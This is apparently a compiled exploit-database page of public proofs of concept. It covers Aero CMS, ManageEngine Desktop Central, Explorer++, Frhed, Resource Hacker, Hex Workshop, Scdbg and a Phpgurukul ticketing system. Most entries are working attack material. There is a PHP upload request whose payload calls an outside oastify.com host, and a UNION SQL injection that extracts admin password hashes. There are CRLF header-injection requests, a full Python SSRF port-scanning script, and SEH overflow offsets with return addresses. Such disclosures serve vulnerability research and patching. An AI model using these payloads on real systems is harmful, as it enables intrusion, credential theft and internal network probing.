Aero CMS version 0.l0.1 remote shell upload exploit. Original discovery of this issue in this version is attributed to D4rkP0w4r in April of 2022.

# Exploit Title: Aero CMS v0.0.1 - PHP Code Injection (auth)  
# Date: 15/10/2022  
# Exploit Author: Hubert Wojciechowski  
# Contact Author: hub.woj12345@gmail.com  
# Vendor Homepage: https://github.com/MegaTKC/AeroCMS  
# Software Link: https://github.com/MegaTKC/AeroCMS  
# Version: 0.0.1  
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

## Example   
-----------------------------------------------------------------------------------------------------------------------  
Param: image content uploading image  
-----------------------------------------------------------------------------------------------------------------------  
Req  
-----------------------------------------------------------------------------------------------------------------------

POST /AeroCMS-master/admin/posts.php?source=add_post HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------369779619541997471051134453116  
Content-Length: 1156  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/AeroCMS-master/admin/posts.php?source=add_post  
Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1

-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_title"

mmmmmmmmmmmmmmmmm  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_category_id"

1  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_user"

admin  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_status"

draft  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="image"; filename="at8vapghhb.php"  
Content-Type: text/plain

<?php printf("bh3gr8e32s".(7*6)."ci4hs9f43t");gethostbyname("48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oasti"."fy.com");?>  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_tags"

-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_content"

<p>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm</p>  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="create_post"

Publish Post  
-----------------------------369779619541997471051134453116--

-----------------------------------------------------------------------------------------------------------------------  
Res:  
-----------------------------------------------------------------------------------------------------------------------

The Collaborator server received a DNS lookup of type A for the domain name 48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oastify.com.

Aero CMS 0.0.1 Remote Shell Upload

Aero CMS version 0.0.1 suffers from multiple remote SQL injection vulnerabilities. Original discovery of this issue in this version is attributed to nu11secur1ty in August of 2022.

    # Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://github.com/MegaTKC/AeroCMS# Software Link: https://github.com/MegaTKC/AeroCMS# Version: 0.0.1# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example SQL Injection-----------------------------------------------------------------------------------------------------------------------Param: search-----------------------------------------------------------------------------------------------------------------------Req sql ini detect-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 21search=245692'&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 03:07:06 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheContent-Length: 3466Connection: closeContent-Type: text/html; charset=UTF-8[...]Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 21search=245692''&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 03:07:10 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 94216[...]-----------------------------------------------------------------------------------------------------------------------Req exploiting sql ini get data admin-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 113search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 05:40:05 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 101144[...]                    <a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a>[...]-----------------------------------------------------------------------------------------------------------------------Other URL and params-----------------------------------------------------------------------------------------------------------------------/AeroCMS-master/admin/posts.php [post_title]/AeroCMS-master/admin/posts.php [filename]/AeroCMS-master/admin/profile.php [filename]/AeroCMS-master/author_posts.php [author]/AeroCMS-master/category.php [category]/AeroCMS-master/post.php [p_id]/AeroCMS-master/search.php [search]/AeroCMS-master/admin/categories.php [cat_title]/AeroCMS-master/admin/categories.php [phpwcmsBELang cookie]/AeroCMS-master/admin/posts.php [post_content]/AeroCMS-master/admin/posts.php [p_id]/AeroCMS-master/admin/posts.php [post_category_id]/AeroCMS-master/admin/posts.php [post_title]/AeroCMS-master/admin/posts.php [reset]

Aero CMS 0.0.1 SQL Injection

Desktop Central version 9.1.0 suffers from crlf injection, and server-side request forgery vulnerabilities.

    # Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities# Discovery by: Rafael Pedrero# Discovery Date: 2021-02-14# Software Link : http://www.desktopcentral.com# Tested Version: 9.1.0 (Build No: 91084)# Tested on:  Windows 10# Vulnerability Type: CRLF injection (CRLF) - 1CVSS v3: 6.1CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-93Vulnerability description: CRLF injection vulnerability in ManageEngineDesktop Central 9.1.0 allows remote attackers to inject arbitrary HTTPheaders and conduct HTTP response splitting attacks via the fileNameparameter in a /STATE_ID/1613157927228/InvSWMetering.csv.Proof of concept:GEThttps://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=trueHTTP/1.1User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101Firefox/85.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3DNT: 1Connection: keep-aliveReferer:https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMeteringUpgrade-Insecure-Requests: 1Content-Length: 0Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;showRefMsg=false; summarypage=false;DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;JSESSIONID=0B20DEF653941DAF5748931B67972CDB;JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024Host: localhostResponse:HTTP/1.1 200 OKDate:Server: ApachePragma: publicCache-Control: max-age=0Expires: Wed, 31 Dec 1969 16:00:00 PSTSET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;SecureSet-Cookie: buildNum=91084; Path=/Set-Cookie: showRefMsg=false; Path=/Set-Cookie: summarypage=false; Path=/Set-Cookie: dc_customerid=1; Path=/Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/Set-Cookie: screenResolution=1280x1024; Path=/Content-Disposition: attachment; filename=anySet-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csvX-dc-header: yesContent-Length: 95Keep-Alive: timeout=5, max=20Connection: Keep-AliveContent-Type: text/csv;charset=UTF-8# Vulnerability Type: CRLF injection (CRLF) - 2CVSS v3: 6.1CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-93Vulnerability description: CRLF injection vulnerability in ManageEngineDesktop Central 9.1.0 allows remote attackers to inject arbitrary HTTPheaders and conduct HTTP response splitting attacks via the fileNameparameter in a /STATE_ID/1613157927228/InvSWMetering.pdf.Proof of concept:GEThttps://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=trueHTTP/1.1User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101Firefox/85.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3DNT: 1Connection: keep-aliveReferer:https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMeteringUpgrade-Insecure-Requests: 1Content-Length: 0Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;showRefMsg=false; summarypage=false;DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;JSESSIONID=0B20DEF653941DAF5748931B67972CDB;JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024Host: localhostHTTP/1.1 200 OKDate:Server: ApachePragma: publicCache-Control: max-age=0Expires: Wed, 31 Dec 1969 16:00:00 PSTSET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;SecureSet-Cookie: buildNum=91084; Path=/Set-Cookie: showRefMsg=false; Path=/Set-Cookie: summarypage=false; Path=/Set-Cookie: dc_customerid=1; Path=/Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/Set-Cookie: screenResolution=1280x1024; Path=/Content-Disposition: attachment; filename=anySet-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013X-dc-header: yesContent-Length: 4470Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/pdf;charset=UTF-8# Vulnerability Type: Server-Side Request Forgery (SSRF)CVSS v3: 8.0CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:HCWE: CWE-918 Server-Side Request Forgery (SSRF)Vulnerability description: Server-Side Request Forgery (SSRF) vulnerabilityin ManageEngine Desktop Central 9.1.0 allows an attacker can force avulnerable server to trigger malicious requests to third-party servers orto internal resources. This vulnerability allows authenticated attackerwith network access via HTTP and can then be leveraged to launch specificattacks such as a cross-site port attack, service enumeration, and variousother attacks.Proof of concept:Save this content in a python file (ex. ssrf_manageenginedesktop9.py),change the variable sitevuln value with ip address:import argparsefrom termcolor import coloredimport requestsimport urllib3import datetimeurllib3.disable_warnings()print(colored('''------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------''',"red"))def smtpConfig_ssrf(target,port,d):    now1 = datetime.datetime.now()    text = ''    sitevuln = 'localhost'    url = 'https://'+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin%40manageengine.com&validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin%40manageengine.com'    cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73;buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false;JSESSIONID=D10A9C62D985A0966647099E14C622F8;DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0'    try:        response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0(Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': 'https://192.168.56.250:8383/smtpConfig.do','Cookie':        cookie,'Connection': 'keep-alive'},verify=False, timeout=10)        text = response.text        now2 = datetime.datetime.now()        rest = (now2 - now1)        seconds = rest.total_seconds()        if ('updateRefMsgCookie' in text):            return colored('Cookie lost',"yellow")        if d == "0":            print ('Time response: ' + str(rest) + '\n' + text + '\n')        if (seconds > 5.0):            return colored('open',"green")        else:            return colored('closed',"red")    except:        now2 = datetime.datetime.now()        rest = (now2 - now1)        seconds = rest.total_seconds()        if (seconds > 10.0):            return colored('open',"green")        else:            return colored('closed',"red")    return colored('unknown',"yellow")if __name__ == "__main__":    parser = argparse.ArgumentParser()    parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 -SSRF Open ports",required=True)    parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9- SSRF Open ports",required=True)    parser.add_argument('-d','--debug', help="ManageEngine Desktop Central9 - SSRF Open ports (0 print or 1 no print)",required=False)    args = parser.parse_args()    timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug)    print (args.ip + ':' + args.port + ' ' + timeresp + '\n')And:$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------192.168.56.250:8080 open$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------192.168.56.250:7777 closed

Desktop Central 9.1.0 CRLF Injection / Server-Side Request Forgery

Explorer32++ version 1.3.5.531 suffers from a buffer overflow vulnerability.

    # Exploit Title: Explorer32++ 1.3.5.531 - Buffer overflow# Discovery by: Rafael Pedrero# Discovery Date: 2022-01-09# Vendor Homepage: http://www.explorerplusplus.com/# Software Link : http://www.explorerplusplus.com/# Tested Version: 1.3.5.531# Tested on:  Windows 10CVSS v3: 7.3CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:HCWE: CWE-119Buffer overflow controlling the Structured Exception Handler (SEH) recordsin Explorer++ 1.3.5.531, and possibly other versions, may allow attackersto execute arbitrary code via a long file name argument.Proof of concept:Open Explorer32++.exe from command line with a large string in Arguments,more than 396 chars:File '<Explorer++_PATH>\Explorer32++.exe'Arguments'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...'SEH chain of main threadAddress    SE handler0018FB14   0069004100370069   *** CORRUPT ENTRY ***0BADF00D   [+] Examining SEH chain0BADF00D       SEH record (nseh field) at 0x0018fb14 overwritten withunicode pattern : 0x00370069 (offset 262), followed by 626 bytes of cyclicdata after the handler

Explorer32++ 1.3.5.531 Buffer Overflow

Frhed version 1.6.0 suffers from a buffer overflow vulnerability.

    # Exploit Title: Frhed (Free hex editor) v1.6.0 - Buffer overflow# Discovery by: Rafael Pedrero# Discovery Date: 2022-01-09# Vendor Homepage: http://frhed.sourceforge.net/# Software Link : http://frhed.sourceforge.net/# Tested Version: 1.6.0# Tested on:  Windows 10CVSS v3: 7.3CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:HCWE: CWE-119Buffer overflow controlling the Structured Exception Handler (SEH) recordsin Frhed (Free hex editor) v1.6.0, and possibly other versions, may allowattackers to execute arbitrary code via a long file name argument.Proof of concept:Open Frhed.exe from command line with a large string in Arguments, morethan 494 chars:File '<Frhed_PATH>\Frhed.exe'Arguments'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...'SEH chain of main threadAddress    SE handler0018FC8C   4136714135714134   *** CORRUPT ENTRY ***0BADF00D   [+] Examining SEH chain0BADF00D       SEH record (nseh field) at 0x0018fc8c overwritten withnormal pattern : 0x35714134 (offset 494), followed by 876 bytes of cyclicdata after the handler0BADF00D   ------------------------------                       'Targets'        =>                           [                               [ '<fill in the OS/app version here>',                                   {                                       'Ret'         =>    0x00401ba7, #pop ecx # pop ecx # ret    - Frhed.exe (change this value by other without\x00)                                       'Offset'    =>    494                                   }                               ],                           ],

Frhed 1.6.0 Buffer Overflow

Resource Hacker version 3.6.0.92 suffers from a buffer overflow vulnerability.

    # Exploit Title: Resource Hacker 3.6.0.92 - Buffer overflow# Discovery by: Rafael Pedrero# Discovery Date: 2022-01-06# Vendor Homepage: http://www.angusj.com/resourcehacker/# Software Link : http://www.angusj.com/resourcehacker/# Tested Version: 3.6.0.92# Tested on:  Windows 10CVSS v3: 7.3CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:HCWE: CWE-119Heap-based buffer overflow controlling the Structured Exception Handler(SEH) records in Reseource Hacker v3.6.0.92, and possibly other versions,may allow attackers to execute arbitrary code via a long file name argument.Proof of concept:Open ResHacker.exe from command line with a large string in Arguments, morethan 268 chars:File 'C:\ResourceHacker36\ResHacker.exe'Arguments'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac...'SEH chain of main threadAddress    SE handler0018FCB4   316A41306A413969   *** CORRUPT ENTRY ***0BADF00D   [+] Examining SEH chain0BADF00D       SEH record (nseh field) at 0x0018fcb4 overwritten withnormal pattern : 0x6a413969 (offset 268), followed by 12 bytes of cyclicdata after the handler0BADF00D   ------------------------------'Targets'        =>[[ '<fill in the OS/app version here>',{                                       'Ret'         =>    0x00426446, #pop eax # pop ebx # ret    - ResHacker.exe (change this value from Mona,with a not \x00 ret address)                                       'Offset'    =>    268}],],

Resource Hacker 3.6.0.92 Buffer Overflow

Hex Workshop version 6.7 is vulnerable to denial of service via command line file arguments and control of the Structured Exception Handler (SEH) records.

    # Exploit Title: Hex Workshop v6.7 - Buffer overflow DoS# Discovery by: Rafael Pedrero# Discovery Date: 2022-01-06# Vendor Homepage: http://www.bpsoft.com, http://www.hexworkshop.com# Software Link : http://www.bpsoft.com, http://www.hexworkshop.com# Tested Version: v6.7# Tested on:  Windows 10CVSS v3: 7.3CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:HCWE: CWE-119Hex Workshop v6.7 is vulnerable to denial of service via a command linefile arguments and control the Structured Exception Handler (SEH) records.Proof of concept:Open HWorks32.exe from command line with a large string in Arguments, morethan 268 chars:File 'C:\Hex Workshop\HWorks32.exe'Arguments'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag..."0BADF00D   [+] Examining SEH chain0BADF00D       SEH record (nseh field) at 0x0089e63c overwritten withunicode pattern : 0x00390069 (offset 268), followed by 0 bytes of cyclicdata after the handlerThe application crash.

Hex Workshop 6.7 Buffer Overflow / Denial Of Service

Scdbg version 1.0 suffers from a buffer overflow vulnerability that can cause a denial of service condition.

    # Exploit Title: Scdbg 1.0 - Buffer overflow DoS# Discovery by: Rafael Pedrero# Discovery Date: 2021-06-13# Vendor Homepage:  http://sandsprite.com/blogs/index.php?uid=7&pid=152# Software Link : https://github.com/dzzie/VS_LIBEMU# Tested Version: 1.0 - Compile date: Jun  3 2021 20:57:45# Tested on:  Windows 7, 10CVSS v3: 7.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:HCWE: CWE-400Vulnerability description: scdbg.exe (all versions) is affected by a Denialof Service vulnerability that occurs when you use the /foff parameter ornot with a specific shellcode causing it to shutdown. Any malware could usethis option to evade the scan.Proof of concept:Save this script like scdbg_crash.py and execute it: scdbg.exe -foff 1 -fscdbg_crash.bin / scdbg.exe -f scdbg_crash.bin#!/usr/bin/env pythoncrash = "\x90\xF6\x84\x01\x90\x90\x90\x90"f = open ("scdbg_crash.bin", "w")f.write(crash)f.close()You can use gui_launcher.exe and check "Start offset 0x": 1 or directlywithout check[image: image.png]

Scdbg 1.0 Denial Of Service

Phpgurukul Park Ticketing Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via the Admin Name parameter.

_\# Exploit Title: PARK TICKETING MANAGEMENT SYSTEM — Stored XSS Vulnreability.  
\# Date: 25–01–2023  
\# Exploit Author: Venkata Siva Kumar Medituru  
\# Vendor Homepage:_ _https://phpgurukul.com/__\# Software Link:_ _https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/__\# Vulnerable Parameter : Admin Name  
\# Version: 1.0  
\# Tested on: Windows 10  
\# Contact:_ _https://www.linkedin.com/in/shivakumar-m-v/_

XSS is an attack technique that injects malicious code into vulnerable web applications. Unlike other attacks, this technique does not target the web server itself, but the user’s browser.

Stored XSS is a type of XSS that stores malicious code on the application server. Using stored XSS is only possible if your application is designed to store user input.

The Reproducive Steps are given in Video PoC.

Remediation :

01) Use Web Application Firewall.

02) Input validation.

CVE-2023-26958: Stored XSS — PARK TICKETING MANAGEMENT SYSTEM(Phpgurukul)

Phpgurukul Park Ticketing Management System 1.0 is vulnerable to SQL Injection via the User Name parameter.

> \# Exploit Title: PARK TICKETING MANAGEMENT SYSTEM — SQL Injection Vulnreability.  
> \# Date: 25–01–2023  
> \# Exploit Author: Venkata Siva Kumar Medituru  
> \# Vendor Homepage: https://phpgurukul.com/  
> \# Software Link: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/  
> \# Vulnerable Parameter : User Name  
> \# Version: 1.0  
> \# Tested on: Windows 10  
> \# Contact: https://www.linkedin.com/in/shivakumar-m-v/

SQL injection is a technique used to exploit the Authentication pages and intruder can penetrate into dashboard without any valid credentials. The perpetrator may enumerate User name, personal information, App functionality and in other words complete account take over is possible.

The reproducive steps are given in vidoe PoC.

> **Mitigations**

01) Configure Web Application Firewall to understand various SQL payloads and to ignore / drop the malicious requests crafted by perpetrator

02) Implement input validations and parametrized queries including prepared statements.

03) Limit the verbose error messages in the responses so that attacker not able to figure out the way to bypass the implemented controls.

Tag

#windows